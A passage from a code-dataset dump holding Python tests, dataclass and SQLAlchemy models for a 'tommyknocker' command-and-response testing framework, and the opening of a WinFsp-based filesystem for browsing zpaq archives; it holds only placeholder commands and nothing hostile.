state._knockers[UUID("00000000-0000-0000-0000-000000000002")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knocker_for_delete", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000003")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="test_description")
def test_list_knockers(self, client):
response = client.get("/api/v1/knockers")
assert response.status_code == 200
assert isinstance(response.json(), list)
def test_get_knocker_by_id(self, client):
response = client.get("/api/v1/knockers/00000000-0000-0000-0000-000000000001")
assert response.status_code == 200
assert response.json()["id"] == "00000000-0000-0000-0000-000000000001"
def test_create_knocker(self, client):
response = client.post("/api/v1/knockers", json={"name": "test_knocker_for_create", "description": "test_description"})
assert response.status_code == 200
assert response.json()["name"] == "test_knocker_for_create"
assert response.json()["description"] == "test_description"
def test_update_knocker(self, client):
response = client.put("/api/v1/knockers/00000000-0000-0000-0000-000000000003", json={"id": "00000000-0000-0000-0000-000000000003", "name": "test_knocker_for_update", "description": "UPDATED"})
assert response.status_code == 200
assert response.json()["description"] == "UPDATED"
def test_delete_knocker(self, client):
response = client.delete("/api/v1/knockers/00000000-0000-0000-0000-000000000002")
assert response.status_code == 200
get_response = client.get("/v1/knockers/00000000-0000-0000-0000-000000000002")
assert get_response.status_code == 404
def test_knocker_checkin(self, client):
response = client.post("/api/v1/knockers/00000000-0000-0000-0000-000000000001/checkin")
assert response.status_code == 200
get_response = client.get("/api/v1/knockers/00000000-0000-0000-0000-000000000001")
assert get_response.json()["last_seen"] is not None | 2,766 | Python | .py | 44 | 56.113636 | 200 | 0.714338 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,551 | test_shared_objects.py | loredous_tommyknocker/src/python/tests/test_shared_objects.py | import datetime
from uuid import uuid4
from shared.models.objects import Knocker, Knock, Runner
from shared.models.dbobjects import DBKnocker, DBKnock, DBRunner
def test_knocker_from_db():
db_knocker = DBKnocker(
name="test_knocker",
description="test_description",
id=uuid4(),
last_seen=datetime.datetime.now()
)
knocker = Knocker.from_db(db_knocker)
assert isinstance(knocker, Knocker)
assert knocker.name == db_knocker.name
assert knocker.description == db_knocker.description
assert knocker.id == db_knocker.id
assert knocker.last_seen == db_knocker.last_seen
def test_runner_from_db():
db_runner = DBRunner(
name="test_runner",
description="test_description",
id=uuid4(),
image_name="test_image_name",
image_tag="test_image_tag"
)
runner = Runner.from_db(db_runner)
assert isinstance(runner, Runner)
assert runner.name == db_runner.name
assert runner.description == db_runner.description
assert runner.id == db_runner.id
assert runner.image_name == db_runner.image_name
assert runner.image_tag == db_runner.image_tag | 1,163 | Python | .py | 32 | 30.9375 | 64 | 0.7 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,552 | test_state.py | loredous_tommyknocker/src/python/tests/test_state.py | import pytest
from controller.state import ControllerStateFactory, ControllerState, InMemoryState
import pytest
from uuid import UUID
from controller.errors import NotFoundException
from shared.models.objects import Knocker, Knock, Runner
def test_controller_state_factory_get_state():
state = ControllerStateFactory.get_state()
assert isinstance(state, ControllerState)
assert state is ControllerStateFactory.get_state()
assert state is ControllerStateFactory.get_state()
def test_controller_state_is_abstract():
with pytest.raises(TypeError):
ControllerState()
class TestInMemoryState:
@pytest.fixture()
def in_memory_state(self):
state = InMemoryState()
state._knockers[UUID("00000000-0000-0000-0000-000000000001")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knocker", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000002")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knocker_for_delete", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000003")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="test_description")
state._knocks[UUID("00000000-0000-0000-0000-000000000001")] = Knock(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knock", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._knocks[UUID("00000000-0000-0000-0000-000000000002")] = Knock(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knock_for_delete", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._knocks[UUID("00000000-0000-0000-0000-000000000003")] = Knock(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knock_for_update", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._runners[UUID("00000000-0000-0000-0000-000000000001")] = Runner(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_runner", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
state._runners[UUID("00000000-0000-0000-0000-000000000002")] = Runner(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_runner_for_delete", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
state._runners[UUID("00000000-0000-0000-0000-000000000003")] = Runner(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_runner_for_update", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
yield state
del state
def test_in_memory_state_is_controller_state(self, in_memory_state):
assert isinstance(in_memory_state, ControllerState)
def test_list_knockers(self, in_memory_state):
state = InMemoryState()
assert isinstance(in_memory_state.list_knockers(), list)
knocker_id = UUID("00000000-0000-0000-0000-000000000001")
assert isinstance(in_memory_state.get_knocker_by_id(knocker_id), Knocker)
assert in_memory_state.get_knocker_by_id(knocker_id).id == knocker_id
def test_create_knocker(self, in_memory_state):
knocker = Knocker(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_knocker_for_create", description="test_description")
assert isinstance(in_memory_state.create_knocker(knocker), Knocker)
assert isinstance(in_memory_state.get_knocker_by_id(knocker.id), Knocker)
assert in_memory_state.get_knocker_by_id(knocker.id) == knocker
def test_update_knocker(self, in_memory_state):
updated_knocker = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="UPDATED")
assert isinstance(in_memory_state.update_knocker(updated_knocker.id, updated_knocker), Knocker)
assert in_memory_state.get_knocker_by_id(updated_knocker.id) == updated_knocker
def test_delete_knocker(self, in_memory_state):
knocker_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_knocker(knocker_id)
with pytest.raises(NotFoundException):
in_memory_state.get_knocker_by_id(knocker_id)
def test_knocker_checkin(self, in_memory_state):
knocker_id = UUID("00000000-0000-0000-0000-000000000001")
in_memory_state.knocker_checkin(knocker_id)
assert in_memory_state.get_knocker_by_id(knocker_id).last_seen is not None
def test_list_knocks(self, in_memory_state):
assert isinstance(in_memory_state.list_knocks(), list)
def test_get_knock_by_id(self, in_memory_state):
knock_id = UUID("00000000-0000-0000-0000-000000000001")
assert isinstance(in_memory_state.get_knock_by_id(knock_id), Knock)
assert in_memory_state.get_knock_by_id(knock_id).id == knock_id
def test_create_knock(self, in_memory_state):
knock = Knock(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_knock_for_create", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
assert isinstance(in_memory_state.create_knock(knock), Knock)
assert in_memory_state.get_knock_by_id(knock.id) == knock
def test_update_knock(self, in_memory_state):
knock = Knock(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knock_for_update UPDATED", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
assert isinstance(in_memory_state.update_knock(knock), Knock)
assert in_memory_state.get_knock_by_id(knock.id) == knock
def test_delete_knock(self, in_memory_state):
knock_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_knock(knock_id)
with pytest.raises(NotFoundException):
in_memory_state.get_knock_by_id(knock_id)
def test_list_runners(self, in_memory_state):
assert isinstance(in_memory_state.list_runners(), list)
def test_get_runner_by_id(self, in_memory_state):
runner_id = UUID("00000000-0000-0000-0000-000000000001")
assert isinstance(in_memory_state.get_runner_by_id(runner_id), Runner)
assert in_memory_state.get_runner_by_id(runner_id).id == runner_id
def test_create_runner(self, in_memory_state):
runner = Runner(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_runner_for_create", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
assert isinstance(in_memory_state.create_runner(runner), Runner)
assert in_memory_state.get_runner_by_id(runner.id) == runner
def test_update_runner(self, in_memory_state):
updated_runner = Runner(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_runner_for_update", description="UPDATED", image_name="test_image_name", image_tag="test_image_tag")
assert isinstance(in_memory_state.update_runner(updated_runner), Runner)
assert in_memory_state.get_runner_by_id(updated_runner.id) == updated_runner
def test_delete_runner(self, in_memory_state):
runner_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_runner(runner_id)
with pytest.raises(NotFoundException):
in_memory_state.get_runner_by_id(runner_id) | 7,449 | Python | .py | 93 | 72.258065 | 251 | 0.725041 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,553 | enums.py | loredous_tommyknocker/src/python/shared/models/enums.py | from enum import Enum
class ResultType(int, Enum):
EXIT_CODE = 1
PRESENT_IN_OUTPUT = 2
REGEX_MATCH_OUTPUT = 3
class MonitorType(int, Enum):
ELASTICSEARCH = 1
MOCK = 2
class TestStatus(int, Enum):
PENDING = 1
KNOCKING = 2
CHECKING = 3
SUCCESS = 4
FAILURE = 5
ERROR = 6
class ComponentStatus(int, Enum):
PENDING = 1
RUNNING = 2
SUCCESS = 3
FAILURE = 4
ERROR = 5
class ComponentType(int, Enum):
KNOCK = 1
RESPONSE = 2 | 492 | Python | .py | 24 | 16.291667 | 33 | 0.645788 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,554 | apiobjects.py | loredous_tommyknocker/src/python/shared/models/apiobjects.py | from dataclasses import Field, dataclass, field
from enum import Enum
from typing import Dict, List, Optional
from uuid import UUID
from shared.models.objects import MonitorType, ResultType, NotUpdated
from shared.models.enums import ComponentStatus, ComponentType, TestStatus
## Knock Objects
@dataclass
class UpdatedKnocker:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
@dataclass
class NewKnocker:
name: str
description: Optional[str] = None
@dataclass
class UpdatedKnock:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
runner_id: Optional[UUID] = NotUpdated
command: Optional[str] = NotUpdated
result_ids: Optional[List[UUID]] = NotUpdated
@dataclass
class NewKnock:
name: str
runner_id: UUID
command: str
description: Optional[str] = None
result_ids: Optional[List[UUID]] = None
@dataclass
class NewRunner:
name: str
image_name: str
image_tag: str
description: Optional[str] = None
@dataclass
class UpdatedRunner:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
image_name: Optional[str] = NotUpdated
image_tag: Optional[str] = NotUpdated
@dataclass
class NewResult:
type: ResultType
value: str
@dataclass
class UpdatedResult:
value: str
## Response Objects
@dataclass
class NewMonitor:
name: str
type: MonitorType
description: Optional[str] = None
config: Optional[Dict[str, str]] = field(default_factory=dict)
@dataclass
class UpdatedMonitor:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
config: Optional[Dict[str, str]] = NotUpdated
@dataclass
class NewResponse:
name: str
monitor_id: UUID
description: Optional[str] = None
monitor_parameters: Dict[str, str] = field(default_factory=dict)
@dataclass
class UpdatedResponse:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
monitor_id: Optional[UUID] = NotUpdated
monitor_parameters: Optional[Dict[str, str]] = NotUpdated
@dataclass
class NewResponseExpectation:
response_id: UUID
expected: bool
timeout: int
@dataclass
class UpdatedResponseExpectation:
expected: Optional[bool] = NotUpdated
timeout: Optional[int] = NotUpdated
## Test Objects
@dataclass
class NewTestConfiguration:
name: str
description: Optional[str] = None
knock_ids: Optional[List[UUID]] = field(default_factory=list)
response_expectation_ids: Optional[List[UUID]] = field(default_factory=list)
@dataclass
class UpdatedTestConfiguration:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
knock_ids: Optional[List[UUID]] = NotUpdated
response_expectation_ids: Optional[List[UUID]] = NotUpdated
@dataclass
class NewTestComponentStatus:
component_id: UUID
component_type: ComponentType
status: ComponentStatus
@dataclass
class UpdatedTestComponentStatus:
status: ComponentStatus
@dataclass
class NewTest:
configuration_id: UUID
knocker_id: UUID
@dataclass
class UpdatedTest:
configuration_id: Optional[UUID] = NotUpdated
knocker_id: Optional[UUID] = NotUpdated
@dataclass
class NewTestSuite:
name: str
description: Optional[str] = NotUpdated
test_configuration_ids: Optional[List[UUID]] = field(default_factory=list)
@dataclass
class UpdatedTestSuite:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
test_configuration_ids: Optional[List[UUID]] = NotUpdated | 3,568 | Python | .py | 120 | 26.175 | 80 | 0.763274 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,555 | objects.py | loredous_tommyknocker/src/python/shared/models/objects.py | from dataclasses import dataclass, asdict, field
import datetime
from enum import Enum
import re
from typing import Any, Dict, List, Optional, Union
from uuid import UUID, uuid4
from shared.models.dbobjects import DBKnock, DBKnocker, DBMonitor, DBResponse, DBResponseExpectation, DBResult, DBRunner, DBTest, DBTestConfiguration, DBTestKnockStatus, DBTestResponseStatus
from shared.models.enums import ComponentStatus, ComponentType, MonitorType, ResultType, TestStatus
class NotUpdated:
pass
class Updateable(object):
def update(self, new):
for key, value in asdict(new).items():
if value is not NotUpdated and hasattr(self, key):
setattr(self, key, value)
def clone_with_updates(self, new):
self_dict = asdict(self)
clone = self.__class__(**self_dict)
new_dict = asdict(new)
for key, value in self_dict.items():
if new_dict.get(key, NotUpdated) is NotUpdated:
new_dict[key] = value
new = self.__class__(**new_dict)
clone.update(new)
return clone
## Knock Objects
@dataclass
class Knocker(Updateable):
name: str
description: str = ""
id: UUID = field(default_factory=uuid4)
last_seen: Optional[datetime.datetime] = None
@classmethod
def from_db(cls, db_knocker: DBKnocker):
return cls(
name=db_knocker.name,
description=db_knocker.description,
id=db_knocker.id,
last_seen=db_knocker.last_seen
)
@dataclass
class Knock(Updateable):
name: str
runner_id: UUID
command: str
description: str = ""
id: UUID = field(default_factory=uuid4)
result_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_knock: DBKnock):
return cls(
id=db_knock.id,
name=db_knock.name,
description=db_knock.description,
runner_id=db_knock.runner.id,
command=db_knock.command,
result_ids=[result.id for result in db_knock.results]
)
@dataclass
class Runner(Updateable):
name: str
description: str
image_name: str
image_tag: str
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_runner: DBRunner):
return cls(
name=db_runner.name,
description=db_runner.description,
id=db_runner.id,
image_name=db_runner.image_name,
image_tag=db_runner.image_tag
)
@dataclass
class Result(Updateable):
type: ResultType
value: str
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_result: DBResult):
return cls(
id=db_result.id,
type=db_result.type,
value=db_result.value
)
def check_result(self, exit_code: int = 0, output: str = "") -> bool:
if self.type == ResultType.EXIT_CODE:
return str(exit_code) == self.value
elif self.type == ResultType.PRESENT_IN_OUTPUT:
return self.value in output.decode()
elif self.type == ResultType.REGEX_MATCH_OUTPUT:
return bool(re.match(self.value, output.decode()))
else:
return False
## Response Objects
@dataclass
class Monitor(Updateable):
name: str
type: MonitorType
config: Dict[str, Any] = field(default_factory=dict)
description: str = ""
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_monitor: DBMonitor):
return cls(
name=db_monitor.name,
description=db_monitor.description,
id=db_monitor.id,
type=db_monitor.type,
config=db_monitor.config
)
@dataclass
class Response(Updateable):
name: str
monitor_id: UUID
monitor_parameters: Dict[str, str]
description: str = ""
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_response: DBResponse):
return cls(
name=db_response.name,
description=db_response.description,
id=db_response.id,
monitor_id=db_response.monitor.id,
monitor_parameters=db_response.monitor_parameters
)
@dataclass
class ResponseExpectation(Updateable):
response_id: UUID
expected: bool
timeout: int
id: UUID = field(default_factory=uuid4)
@classmethod
def from_db(cls, db_response_expectation: DBResponseExpectation):
return cls(
id=db_response_expectation.id,
response_id=db_response_expectation.response.id,
expected=db_response_expectation.expected,
timeout=db_response_expectation.timeout
)
## Test Objects
@dataclass
class TestConfiguration(Updateable):
name: str
id: UUID = field(default_factory=uuid4)
description: str = ""
knock_ids: List[UUID] = field(default_factory=list)
response_expectation_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test_configuration: DBTestConfiguration):
return cls(
name=db_test_configuration.name,
description=db_test_configuration.description,
id=db_test_configuration.id,
knock_ids=[knock.id for knock in db_test_configuration.knocks],
response_expectation_ids=[response_expectation.id for response_expectation in db_test_configuration.response_expectations]
)
@dataclass
class TestComponentStatus(Updateable):
component_id: UUID
component_type: ComponentType
status: ComponentStatus
id: UUID = field(default_factory=uuid4)
updated: Optional[datetime.datetime] = None
@classmethod
def from_db(cls, db_test_component_status: Union[DBTestKnockStatus, DBTestResponseStatus]):
if isinstance(db_test_component_status, DBTestKnockStatus):
return cls(
id=db_test_component_status.id,
component_id=db_test_component_status.knock.id,
component_type=ComponentType.KNOCK,
status=db_test_component_status.status,
updated=db_test_component_status.updated
)
else:
return cls(
id=db_test_component_status.id,
component_id=db_test_component_status.response.id,
component_type=ComponentType.RESPONSE,
status=db_test_component_status.status,
updated=db_test_component_status.updated
)
@dataclass
class Test(Updateable):
configuration_id: UUID
knocker_id: UUID
id: UUID = field(default_factory=uuid4)
started: Optional[datetime.datetime] = None
ended: Optional[datetime.datetime] = None
status: TestStatus = TestStatus.PENDING
component_status_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test: DBTest):
return cls(
id=db_test.id,
configuration_id=db_test.configuration.id,
knocker_id=db_test.knocker.id,
started=db_test.started,
ended=db_test.ended,
status=db_test.status,
component_status_ids=[component_status.id for component_status in db_test.knock_statuses + db_test.response_statuses]
)
@dataclass
class TestSuite(Updateable):
name: str
id: UUID = field(default_factory=uuid4)
description: str = ""
test_cofiguration_ids: List[UUID] = field(default_factory=list)
@classmethod
def from_db(cls, db_test_suite):
return cls(
id=db_test_suite.id,
name=db_test_suite.name,
description=db_test_suite.description,
test_cofiguration_ids=[test_configuration.id for test_configuration in db_test_suite.test_configurations]
) | 7,860 | Python | .py | 218 | 28.087156 | 190 | 0.653507 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,556 | dbobjects.py | loredous_tommyknocker/src/python/shared/models/dbobjects.py | from datetime import datetime
import sqlalchemy
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship
from typing import Dict, List, Optional
from uuid import UUID
from shared.models.enums import MonitorType, ResultType, TestStatus, ComponentStatus
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from shared.models.objects import Knock, Knocker, Monitor, Response, ResponseExpectation, Result, Runner, TestComponentStatus, TestConfiguration
class Base(DeclarativeBase):
pass
## Knock Objects
class DBKnocker(Base):
__tablename__ = 'knockers'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
last_seen: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
knock_results = sqlalchemy.Table(
'knock_results',
Base.metadata,
sqlalchemy.Column('knock_id', sqlalchemy.String, sqlalchemy.ForeignKey('knocks.id')),
sqlalchemy.Column('result_id', sqlalchemy.String, sqlalchemy.ForeignKey('results.id'))
)
class DBKnock(Base):
__tablename__ = 'knocks'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
runner_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('runners.id'))
runner: Mapped["Runner"] = relationship("DBRunner")
command: Mapped[str] = mapped_column(sqlalchemy.String)
results: Mapped[List["Result"]] = relationship("DBResult", secondary="knock_results")
class DBRunner(Base):
__tablename__ = 'runners'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
image_name: Mapped[str] = mapped_column(sqlalchemy.String)
image_tag: Mapped[str] = mapped_column(sqlalchemy.String)
class DBResult(Base):
__tablename__ = 'results'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
type: Mapped[ResultType] = mapped_column(sqlalchemy.Enum(ResultType))
value: Mapped[str] = mapped_column(sqlalchemy.String)
## Response Objects
class DBMonitor(Base):
__tablename__ = 'monitors'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
type: Mapped[MonitorType] = mapped_column(sqlalchemy.Enum(MonitorType))
config: Mapped[Dict[str, str]] = mapped_column(sqlalchemy.JSON)
class DBResponse(Base):
__tablename__ = 'responses'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
monitor_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('monitors.id'))
monitor: Mapped["Monitor"] = relationship("DBMonitor")
monitor_parameters: Mapped[Dict[str, str]] = mapped_column(sqlalchemy.JSON)
class DBResponseExpectation(Base):
__tablename__ = 'response_expectations'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
type: Mapped[ResultType] = mapped_column(sqlalchemy.Enum(ResultType))
value: Mapped[str] = mapped_column(sqlalchemy.String)
## Test Objects
test_knocks = sqlalchemy.Table(
'test_knocks',
Base.metadata,
sqlalchemy.Column('test_configuration_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_configurations.id')),
sqlalchemy.Column('knock_id', sqlalchemy.String, sqlalchemy.ForeignKey('knocks.id'))
)
test_response_expectations = sqlalchemy.Table(
'test_response_expectations',
Base.metadata,
sqlalchemy.Column('test_configuration_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_configurations.id')),
sqlalchemy.Column('response_expectation_id', sqlalchemy.String, sqlalchemy.ForeignKey('response_expectations.id'))
)
class DBTestConfiguration(Base):
__tablename__ = 'test_configurations'
name: Mapped[str] = mapped_column(sqlalchemy.String)
description: Mapped[Optional[str]] = mapped_column(sqlalchemy.String)
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
knocks: Mapped[List["Knock"]] = relationship("DBKnock", secondary="test_knocks")
response_expectations: Mapped[List["ResponseExpectation"]] = relationship("DBResponseExpectation", secondary="test_response_expectations")
class DBTestKnockStatus(Base):
__tablename__ = 'test_knock_statuses'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
status: Mapped[ComponentStatus] = mapped_column(sqlalchemy.Enum(ComponentStatus))
knock_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('knocks.id'))
knock: Mapped["Knock"] = relationship("DBKnock")
updated: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
class DBTestResponseStatus(Base):
__tablename__ = 'test_response_statuses'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
status: Mapped[ComponentStatus] = mapped_column(sqlalchemy.Enum(ComponentStatus))
response_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('responses.id'))
response: Mapped["Response"] = relationship("DBResponse")
updated: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
test_knock_statuses = sqlalchemy.Table(
'test_knock_status_relationships',
Base.metadata,
sqlalchemy.Column('test_id', sqlalchemy.String, sqlalchemy.ForeignKey('tests.id')),
sqlalchemy.Column('knock_status_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_knock_statuses.id'))
)
test_response_statuses = sqlalchemy.Table(
'test_response_status_relationships',
Base.metadata,
sqlalchemy.Column('test_id', sqlalchemy.String, sqlalchemy.ForeignKey('tests.id')),
sqlalchemy.Column('response_status_id', sqlalchemy.String, sqlalchemy.ForeignKey('test_response_statuses.id'))
)
class DBTest(Base):
__tablename__ = 'tests'
id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, primary_key=True)
configuration_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('test_configurations.id'))
configuration: Mapped["TestConfiguration"] = relationship("DBTestConfiguration")
knocker_id: Mapped[UUID] = mapped_column(sqlalchemy.UUID, sqlalchemy.ForeignKey('knockers.id'))
knocker: Mapped["Knocker"] = relationship("DBKnocker")
started: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
ended: Mapped[datetime] = mapped_column(sqlalchemy.DateTime)
status: Mapped[TestStatus] = mapped_column(sqlalchemy.Enum(TestStatus))
knock_statuses: Mapped[List["TestComponentStatus"]] = relationship("DBTestKnockStatus", secondary="test_knock_status_relationships")
response_statuses: Mapped[List["TestComponentStatus"]] = relationship("DBTestResponseStatus", secondary="test_response_status_relationships") | 7,182 | Python | .py | 124 | 53.620968 | 148 | 0.758163 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,557 | zpaq_fileexplorer.py | EpicGazel_ZpaqTreeView/zpaq_fileexplorer.py | import os
from tkinter import filedialog
from os import getcwd
import zpaqtreeview as ztv
import sys
import logging
import argparse
import threading
from functools import wraps
from pathlib import Path, PureWindowsPath
from winfspy import (
FileSystem,
BaseFileSystemOperations,
enable_debug_log,
FILE_ATTRIBUTE,
CREATE_FILE_CREATE_OPTIONS,
NTStatusObjectNameNotFound,
NTStatusDirectoryNotEmpty,
NTStatusNotADirectory,
NTStatusObjectNameCollision,
NTStatusAccessDenied,
NTStatusEndOfFile,
NTStatusMediaWriteProtected,
)
from winfspy.plumbing.win32_filetime import filetime_now
from winfspy.plumbing.security_descriptor import SecurityDescriptor
from tqdm import tqdm
def operation(fn):
"""Decorator for file system operations.
Provides both logging and thread-safety
"""
name = fn.__name__
@wraps(fn)
def wrapper(self, *args, **kwargs):
head = args[0] if args else None
tail = args[1:] if args else ()
try:
with self._thread_lock:
result = fn(self, *args, **kwargs)
except Exception as exc:
logging.info(f" NOK | {name:20} | {head!r:20} | {tail!r:20} | {exc!r}")
raise
else:
logging.info(f" OK! | {name:20} | {head!r:20} | {tail!r:20} | {result!r}")
return result
return wrapper
class BaseFileObj:
@property
def name(self):
"""File name, without the path"""
return self.path.name
@property
def file_name(self):
"""File name, including the path"""
return str(self.path)
def __init__(self, path, attributes, security_descriptor, file_data):
self.path = path
self.file_data = file_data
self.attributes = attributes
self.security_descriptor = security_descriptor
now = filetime_now()
self.creation_time = now
self.last_access_time = now
self.last_write_time = now
self.change_time = now
self.index_number = 0
self.file_size = 0
def get_file_info(self):
return {
"file_attributes": self.attributes,
"allocation_size": self.allocation_size,
"file_size": self.file_size,
"creation_time": self.creation_time,
"last_access_time": self.last_access_time,
"last_write_time": self.last_write_time,
"change_time": self.change_time,
"index_number": self.index_number,
}
def __repr__(self):
return f"{type(self).__name__}:{self.file_name}"
class FileObj(BaseFileObj):
allocation_unit = 4096
def __init__(self, path, attributes, security_descriptor, file_data, allocation_size=0):
super().__init__(path, attributes, security_descriptor, file_data)
self.data = bytearray(allocation_size)
self.attributes |= FILE_ATTRIBUTE.FILE_ATTRIBUTE_ARCHIVE
assert not self.attributes & FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY
@property
def allocation_size(self):
return 0 if type(self.data) is not bytearray else len(self.data) #len(self.data)
def set_allocation_size(self, allocation_size):
if allocation_size < self.allocation_size:
self.data = self.data[:allocation_size]
if allocation_size > self.allocation_size:
self.data += bytearray(allocation_size - self.allocation_size)
assert self.allocation_size == allocation_size
self.file_size = min(self.file_size, allocation_size)
def adapt_allocation_size(self, file_size):
units = (file_size + self.allocation_unit - 1) // self.allocation_unit
self.set_allocation_size(units * self.allocation_unit)
def set_file_size(self, file_size):
if file_size < self.file_size:
zeros = bytearray(self.file_size - file_size)
self.data[file_size : self.file_size] = zeros
if file_size > self.allocation_size:
self.adapt_allocation_size(file_size)
self.file_size = file_size
# def read(self, offset, length):
# if offset >= self.file_size:
# raise NTStatusEndOfFile()
# end_offset = min(self.file_size, offset + length)
#
# if self.file_size < self.max_cache_size: # 5 MB
# ex_file = ztv.extract_file(config, "B:/g_small.zpaq", self.file_data.fullPath,
# "%userprofile%/AppData/Local/", self.file_data.is_directory())
#
# file_bytes = 0
# with open(ex_file, 'rb') as f:
# file_bytes = f.read()
#
# self.data = file_bytes
# return file_bytes #self.data[offset:end_offset]
class FolderObj(BaseFileObj):
def __init__(self, path, attributes, security_descriptor, file_data):
super().__init__(path, attributes, security_descriptor, file_data)
self.allocation_size = 0
assert self.attributes & FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY
class OpenedObj:
def __init__(self, file_obj):
self.file_obj = file_obj
def __repr__(self):
return f"{type(self).__name__}:{self.file_obj.file_name}"
class ZpaqFileSystemOperations(BaseFileSystemOperations):
def __init__(self, volume_label, input_file, cache_location, max_cache_size, config, read_only=False):
super().__init__()
if len(volume_label) > 31:
raise ValueError("`volume_label` must be 31 characters long max")
max_file_nodes = 1024
max_file_size = 16 * 1024 * 1024
file_nodes = 1
self._volume_info = {
